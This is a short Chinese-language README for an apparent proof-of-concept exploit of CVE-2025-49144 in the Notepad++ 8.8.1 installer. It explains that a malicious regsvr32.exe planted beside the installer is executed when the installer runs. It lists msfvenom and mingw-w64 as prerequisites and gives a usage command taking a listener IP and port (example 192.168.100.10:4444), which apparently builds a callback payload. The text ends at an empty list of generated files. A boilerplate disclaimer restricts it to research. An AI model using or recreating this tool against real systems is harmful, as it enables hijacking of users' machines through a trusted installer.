此存储库包含一个功能性的概念验证(PoC),利用 Notepad++ 8.8.1 安装程序 中的 CVE-2025-49144 漏洞。恶意执行通过将二进制文件(regsvr32.exe)放置在易受攻击的安装程序同一目录下实现。当执行安装程序时,它会继承上下文并触发载荷。
⚠️ 免责声明
此代码严格仅用于教育和研究目的。未经明确许可在系统上未经授权使用可能构成违法。
作者对任何滥用或涉及此工具的恶意活动不承担任何责任。
msfvenom(Metasploit 框架的一部分)mingw-w64(x86_64-w64-mingw32-gcc)npp.8.8.1.Installer.x64.exe(必须手动放置在同一目录下)python3 exploit.py -i <LHOST> -p <LPORT>
示例:
python3 exploit.py -i 192.168.100.10 -p 4444
这将生成以下文件:
[
]